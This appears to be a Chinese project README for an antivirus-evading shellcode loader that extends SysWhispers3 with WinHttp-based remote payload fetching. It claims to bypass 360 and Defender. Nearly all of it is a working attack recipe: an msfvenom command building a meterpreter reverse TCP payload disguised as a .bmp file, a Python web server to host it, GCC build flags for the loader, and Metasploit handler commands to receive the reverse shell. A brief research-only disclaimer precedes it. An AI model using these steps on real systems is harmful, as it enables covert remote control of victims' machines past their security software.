SysWhispers3WinHttp 基于SysWhispers3项目增添WinHttp分离加载功能并使用32位GCC进行编译,文件大小14KB,可免杀绕过360核晶防护与Defender。
该项目仅供安全研究使用,禁止使用该项目进行违法操作,否则由使用者承担全部法律及连带责任。
// 1. 使用msfvenom生成shellcode(或使用CobaltStrike生成Stageless之shellcode)
msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.1.104 lport=4444 -f raw -o test.bmp
// 2. 使用python3开启Web服务(或使用CobaltStrike之Scripted Web Delivery功能)
python3 -m http.server
// 3. 修改SysWhispers3WinHttp.c 第40行IP地址并使用32位GCC进行编译
gcc .\syscalls.c .\SysWhispers3WinHttp.c -o .\SysWhispers3WinHttp.exe -masm=intel -fpermissive -w -s -lwinhttp
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > run
https://github.com/klezVirus/SysWhispers3
https://learn.microsoft.com/zh-cn/windows/win32/api/winhttp/nf-winhttp-winhttpconnect